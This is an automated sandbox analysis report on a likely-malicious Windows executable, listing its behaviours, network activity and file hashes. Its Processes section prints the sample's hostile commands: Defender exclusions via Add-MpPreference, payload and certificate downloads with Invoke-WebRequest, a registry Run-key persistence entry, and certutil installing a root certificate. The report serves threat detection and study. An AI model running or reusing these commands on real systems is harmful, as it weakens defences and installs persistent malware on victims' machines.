Malware Analysis Report

2025-06-16 00:36

Sample ID 241111-al7pxsydnd
Target 7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N
SHA256 7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68
Tags
discovery execution persistence
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68

Threat Level: Likely malicious

The file 7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N was found to be: Likely malicious.

Malicious Activity Summary

discovery execution persistence

Command and Scripting Interpreter: PowerShell

Adds Run key to start application

Browser Information Discovery

Unsigned PE

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 00:19

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 00:19

Reported

2024-11-11 00:21

Platform

win10v2004-20241007-en

Max time kernel

113s

Max time network

110s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Program Files\\MicrosoftWindows\\Windows" C:\Windows\system32\reg.exe N/A

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2252 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe C:\Windows\SYSTEM32\cmd.exe
PID 2252 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe C:\Windows\SYSTEM32\cmd.exe
PID 4164 wrote to memory of 2284 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 4164 wrote to memory of 2284 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 4164 wrote to memory of 4168 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 4164 wrote to memory of 4168 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 4168 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4168 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 564 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 564 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2252 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe C:\Windows\SYSTEM32\cmd.exe
PID 2252 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe C:\Windows\SYSTEM32\cmd.exe
PID 2956 wrote to memory of 4764 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 4764 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 8 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 8 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 8 wrote to memory of 2288 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 2288 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 4304 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 4304 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 1856 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 1856 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 4708 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 4708 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 4368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 4368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 8 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 1728 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
PID 2896 wrote to memory of 2976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
PID 2896 wrote to memory of 2976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
PID 2896 wrote to memory of 2976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
PID 2896 wrote to memory of 2976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
PID 8 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 8 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 8 wrote to memory of 4480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 4480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 3112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 8 wrote to memory of 3112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe

"C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c type site.txt | cmd

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type site.txt "

C:\Windows\system32\cmd.exe

cmd

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --app="https://sebupdate.pages.dev" --disable-infobars --no-first-run --disable-session-crashed-bubble --disable-extensions --disable-features=VizDisplayCompositor --disable-gpu --disable-software-rasterizer --enable-fast-unload --start-maximized --no-sandbox

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xe4,0x110,0x114,0xf0,0x118,0x7ffbfb9946f8,0x7ffbfb994708,0x7ffbfb994718

C:\Windows\SYSTEM32\cmd.exe

cmd /k type test.txt | cmd

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type test.txt "

C:\Windows\system32\cmd.exe

cmd

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\MicrosoftWindows'"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,5963019434474726042,15921565733852789922,131072 --disable-features=VizDisplayCompositor --no-sandbox --gpu-preferences=UAAAAAAAAADgAgAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,5963019434474726042,15921565733852789922,131072 --disable-features=VizDisplayCompositor --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2292 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,5963019434474726042,15921565733852789922,131072 --disable-features=VizDisplayCompositor --lang=en-US --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --field-trial-handle=2120,5963019434474726042,15921565733852789922,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --field-trial-handle=2120,5963019434474726042,15921565733852789922,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\MicrosoftWindows\Microsoft.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\MicrosoftWindows\Windows.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://localhost:8000/Windows.exe' -OutFile 'Windows.exe'"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,5963019434474726042,15921565733852789922,131072 --disable-features=VizDisplayCompositor --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=4600 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,5963019434474726042,15921565733852789922,131072 --disable-features=VizDisplayCompositor --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=4600 /prefetch:8

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows" /t REG_SZ /d "C:\Program Files\MicrosoftWindows\Windows" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://localhost:8000/mspfxx.pfx' -OutFile 'mspfxx.pfx'"

C:\Windows\system32\certutil.exe

certutil -importpfx -p "MS12345" Root "mspfxx.pfx"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 sebupdate.pages.dev udp
US 172.66.44.55:443 sebupdate.pages.dev tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.44.66.172.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\site.txt

MD5 dca4293493e0cd4e9e665fb1cfe6ed44
SHA1 0f886b72d4990cfc37160c36121f31cb9cb893de
SHA256 e6313afef241d78fb094839c6e470d71ae4683b7a315370eadd7afd264b33776
SHA512 afb0959e5fe859a5746353915cf25e4595dd22eab5855677cb252dde78af1865ce376b89cc1c20718e48ff5fa20263fd7a3a45406ab664326fff472cb88bd216

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 37f660dd4b6ddf23bc37f5c823d1c33a
SHA1 1c35538aa307a3e09d15519df6ace99674ae428b
SHA256 4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8
SHA512 807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\test.txt

MD5 50376cee3a2e445f02f6c7c16ca336f3
SHA1 37de7bab98781804a838f2f2d58cff57b6a18ccc
SHA256 f247f564807ec2ff33a7c233f30eb4d7111f2e33e31636a60d9ffebafbc93051
SHA512 de1c91434c2975d0afcc20ef7c1f292204660c2f1fbaf1af28ab53fbe71fdca9f491beda58d09ab430eeacb0ecd359dc3ce2e336b615bc920366a404ea96c1f0

memory/2288-12-0x00007FFBFABA3000-0x00007FFBFABA5000-memory.dmp

memory/2288-18-0x000002549B4A0000-0x000002549B4C2000-memory.dmp

memory/2288-23-0x00007FFBFABA0000-0x00007FFBFB661000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2h3atoz0.z50.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2288-24-0x00007FFBFABA0000-0x00007FFBFB661000-memory.dmp

\??\pipe\LOCAL\crashpad_2896_EOTOSTYEVFJYBKLK

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d7cb450b1315c63b1d5d89d98ba22da5
SHA1 694005cd9e1a4c54e0b83d0598a8a0c089df1556
SHA256 38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031
SHA512 df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 078ba4c38ba943d108810fe5c82cf9b5
SHA1 f3e28e8ca72e1fed4716bc994dc1ee41ac9568bc
SHA256 9609deb906372f8aca76550a1d01d81202ab769a5aa75419cfc06a0cf188ec2c
SHA512 309d358b6f0c1fa346299736f2368587c62de2bf0bd28ce2342011d1283d6564852b9efb512d616871f969e7e11f3424ece5abea2a2784ad7c2e152579e6c282

memory/2288-45-0x00007FFBFABA0000-0x00007FFBFB661000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8cb3e9459807e35f02130fad3f9860d
SHA1 5af7f32cb8a30e850892b15e9164030a041f4bd6
SHA256 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512 045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 da5c82b0e070047f7377042d08093ff4
SHA1 89d05987cd60828cca516c5c40c18935c35e8bd3
SHA256 77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
SHA512 7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

